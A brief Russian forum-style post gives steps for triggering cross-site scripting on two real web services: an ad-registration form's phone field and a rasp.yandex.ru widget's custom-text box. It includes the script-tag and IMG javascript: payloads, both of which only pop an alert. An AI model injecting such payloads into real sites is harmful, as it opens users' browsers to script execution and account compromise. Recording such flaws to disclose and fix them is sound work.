Заходим сюды ---> Зарегистрироваться и разместить рекламу ----> вводим любые данные ----> выбераем что будем продавать ----> уязвимое поле " нофелет "
'><script>alert(/XSS/)</script>
Заходим сюда --->http://rasp.yandex.ru/widgets/route?station_from=9623562&station_to=9600215&thre ad=YUT376A_agent&dateForward=2009-12-22
Видем внизу
Текст:
-«Вылетаю!»
-«Встречайте!»
-написать свой текст <---- он нам и нужен
Вставляем туда ---> <IMG SRC=" javascript:alert('XSS');"> ----> жмем получить код ---> потом выбераем любую из них «Вылетаю!» , «Встречайте!» и снова жмем обратно ( где скрипт ) и вот она долгожданная "XSS" ))